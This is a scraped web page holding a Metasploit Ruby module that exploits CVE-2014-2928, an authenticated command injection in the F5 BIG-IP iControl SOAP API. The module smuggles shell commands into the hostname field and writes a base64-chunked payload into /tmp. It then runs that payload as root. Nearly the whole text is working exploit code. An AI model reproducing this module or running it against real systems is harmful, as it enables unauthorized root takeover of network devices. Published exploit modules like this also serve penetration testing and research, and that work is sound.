扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "F5 iControl Remote Root Command Execution", 'Description'=> %q{ This module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices). }, 'License'=> MSF_LICENSE, 'Author' => [ 'bperry' # Discovery, Metasploit module ], 'References' => [ ['CVE', '2014-2928'], ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets'=> [ ['F5 iControl', {}] ], 'Privileged' => true, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget'=> 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) ], self.class) end def check get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" /> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ hostname = $1 send_cmd("whoami") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => get_hostname, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) res.body =~ /y:string">(.*)<\/return/ new_hostname = $1 if new_hostname == "root.a.b" pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>#{hostname}</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def send_cmd(cmd) pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname><code>#{cmd}</code>.a.b</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) end def exploit filename = Rex::Text.rand_text_alpha_lower(5) print_status('Sending payload in chunks, might take a small bit...') i = 0 while i < payload.encoded.length cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}" send_cmd(cmd) i = i + 5 end print_status('Triggering payload...') send_cmd("sh /tmp/#{filename}") end end |
体验盒子
